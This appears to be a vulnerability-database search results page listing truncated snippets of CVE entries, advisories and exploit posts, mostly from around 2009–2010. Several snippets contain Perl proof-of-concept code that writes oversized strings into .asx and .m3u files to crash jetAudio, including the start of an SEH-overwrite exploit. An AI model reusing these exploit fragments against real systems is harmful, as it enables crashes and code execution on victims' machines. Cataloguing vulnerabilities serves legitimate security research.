4195 matches found
Authentication flaw
admin.htm in Geo++ GNCASTER 1.4.0.7 and earlier does not properly enforce HTTP Digest Authentication, which allows remote authenticated users to use HTTP Basic Authentication, bypassing intended server policy...
CVE-2010-0550
admin.htm in Geo++ GNCASTER 1.4.0.7 and earlier does not properly enforce HTTP Digest Authentication, which allows remote authenticated users to use HTTP Basic Authentication, bypassing intended server policy...
MS09-020 IIS6 WebDAV Unicode Auth Bypass Directory Scanner
This module is based on et's HTTP Directory Scanner module, with one exception. Where authentication is required, it attempts to bypass authentication using the WebDAV IIS6 Unicode vulnerability discovered by Kingcope. The vulnerability appears to be exploitable where WebDAV is enabled on the IIS...
Wodig4. 1. 3 Access the free version(UTF-8)upload vulnerability-vulnerability warning-the black bar safety net
1, The upload/uploadimage. asp, Mutiuploadimage. asp. From the cookie to obtain the userid and put in the session, as the path. ASP/Visual Basic code 1. loadsrc="/UploadFile/"&Request. Cookies"UserID"&"/" 'if the website is not put in with the directory, please/UploadFile before adding you to...
Wodig4. 1. 3 Access the free version(UTF-8)upload vulnerability-vulnerability warning-the black bar safety net
Author: unknown 1, The upload/uploadimage. asp, Mutiuploadimage. asp. From the cookie to obtain the userid and put in the session, as the path. ASP/Visual Basic code 1. loadsrc="/UploadFile/"&Request. Cookies"UserID"&"/" 'if the website is not put in with the directory, please/UploadFile before...
jetAudio 8.0.0.2 Basic - .m3u Local Stack Overflow
jetAudio 8.0.0.2 Basic - .m3u Local Stack Overflow !/usr/bin/perl Title: jetAudio 8.0.0.2 Basic m3u Stack Overflow Exploit Author: cr4wl3r Tested: Windows xpsp2 my $file="b00m.m3u"; my $header = "http://"; my $junk = "A" x 1017; my $nseh = "\xeb\x06\x90\x90"; my $seh = pack'V',0x01221045; my...
jetAudio 8.0.0.2 Basic - '.asx' Local Crash
!/usr/bin/perl Title: jetAudio 8.0.0.2 Basic Local Crash Exploit Author: cr4wl3r Platform: Windows my $file= "crash.asx"; my $boom= "http://"."AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000; open$FILE,"$file"; print $FILE "$boom"; close$FILE; print "Done..!\n";...
iPhone / iPod - Udisk FTP Basic Edition Remote 0day DoS Exploit
Exploit for unknown platform in category dos / poc =================================================================== Apple iPhone/iPod - Udisk FTP Basic Edition Remote 0day DoS Exploit ===================================================================...
iOS Udisk FTP Basic Edition - Remote Denial of Service
!/usr/bin/python Apple Iphone/Ipod - Udisk FTP Basic Edition Remote 0day DOS exploit Found by: Steven Seeley mrme seeleymagic at hotmail dot com Homepage: http://6tags.com/n/ Price: $4.99 Download: From the app store use your itunes account Tested on: Iphone 3G - firmware 3.1.2 Darwin kernel Gree...
CVE-2009-4591
SQL injection vulnerability in Basic Analysis and Security Engine BASE before 1.4.4 allows remote attackers to execute arbitrary SQL commands via unspecified vectors...
CVE-2009-4592
BASE prior to 1.4.4 is affected by CVE-2009-4592: an unspecified vulnerability in base_local_rules.php allows remote attackers to include arbitrary local files via unknown vectors. The OpenVAS entries also describe multiple input-validation vulnerabilities in BASE before 1.4.4, including local fi...
CVE-2009-4592
Unspecified vulnerability in baselocalrules.php in Basic Analysis and Security Engine BASE before 1.4.4 allows remote attackers to include arbitrary local files via unknown vectors...
ACTCMS injection vulnerability-vulnerability warning-the black bar safety net
An ASP of the CMS program. With people is not too much. GOOGLE the keyword“Copyright @ 2 0 0 6 www.actcms.com” not too much. Today looked at the code. Substantially all of the parameters have all been filtered out. But the vote there is a small problem.. In/plus/vote/vote. asp page. The code is a...
jetAudio Basic 7.5.5.25 Buffer Overflow
!/user/bin/perl Author: D3V!L FUCKER Version: jetAudio v 7.5.5.25 Basic Tested on: windows vista sp0 Code : my $file= "crash.asx"; my $boom= "http://"."AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000; open$FILE,"$file"; print $FILE "$boom"; close$FILE; print...
jetAudio 8.0.0.0 - '.asx' Basic Local Crash (PoC)
!/user/bin/perl Exploit Title: Local Crash Poc Date: Fri/Dec/25/2009 Author: D3V!L FUCKER Software Link: http://www.jetaudio.com Version: jetAudio v 8.0.0.0 Basic Tested on: windows vista sp0 Code : my $file= "crash.asx"; my $boom=...
JetAudio Basic 7.5.5.25 - '.asx' Buffer Overflow (PoC)
!/user/bin/perl Author: D3V!L FUCKER Version: jetAudio v 7.5.5.25 Basic Tested on: windows vista sp0 Code : my $file= "crash.asx"; my $boom= "http://"."AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000; open$FILE,"$file"; print $FILE "$boom"; close$FILE; print...
php 5.1.5 basic-functions.c 权限提升漏洞
No description provided by source...
New Security Consortium to Focus on Long-Term Projects
The three universities involved in the security consortium put together this week by Northrop Grumman will have wide latitude to pursue research projects as they see fit and will be under no obligation to work only on technology that fits Northrop’s future plans. The researchers, in fact, will be...
Remote Command Execution in dotDefender Site Management
Problem Description =================== A remote command execution vulnerability exists in the dotDefender 3.8-5 Site Management. dotDefender 1 is a web appliaction firewall WAF which 'prevents hackers from attacking your website.' Technical Details ================= The Site Management applicati...
Microsoft Visual Basic VBP Buffer Overflow
This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core' class Metasploit3 'Microsoft Visual...